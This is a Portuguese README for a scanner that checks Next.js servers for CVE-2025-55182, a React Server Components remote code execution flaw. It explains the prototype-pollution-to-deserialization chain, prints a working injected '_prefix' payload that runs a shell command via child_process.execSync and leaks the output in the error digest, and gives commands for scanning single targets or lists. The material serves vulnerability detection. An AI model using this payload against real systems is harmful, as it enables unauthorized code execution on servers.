
Scanner de segurança para CVE-2025-55182 - Vulnerabilidade crítica de RCE em React Server Components
Esta ferramenta verifica se um alvo é vulnerável ao CVE‑2025‑55182, um bug de Execução Remota de Código causado pela manipulação insegura de payloads de modelo RSC (React Server Components) dentro do Next.js.
A vulnerabilidade encadeia Poluição de Protótipo → Abuso de Desserialização → Execução de JavaScript no Lado do Servidor.
Aviso: Use isto apenas em sistemas que você possui legalmente ou para os quais tem autorização explícita. Testes não autorizados = crime, mano.
O Next.js processa internamente objetos especiais “modelo” enviados via multipart/form-data.
Se um atacante injeta uma estrutura maliciosa como um thenable forjado, ele pode envenenar:
__proto___response._prefixconstructor.constructorIsso leva o servidor a avaliar JavaScript controlado pelo atacante, resultando em RCE completo.
-u) ou lista de alvos (-l)id) do digest de erro do servidorfoxvuln.txtpython3 main.py -u https://alvo.com
python3 main.py -l lista.txt
O payload abusa de process.mainModule.require('child_process').execSync() via _prefix injetado:
"_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
Isso força o servidor a executar id e vazar o resultado dentro do digest lançado (porque erros RSC propositalmente retornam um campo “digest” estruturado).
Alvo vulnerável:
[+] Testando: https://vitima.com
[VULN] usuário : uid=1000(www-data)
Não vulnerável:
[+] Testando: https://seguro.com
[NOT VULN]
Todas as URLs confirmadas como vulneráveis são salvas em:
foxvuln.txt
Formato:
https://vitima.com => uid=1000(www-data)
/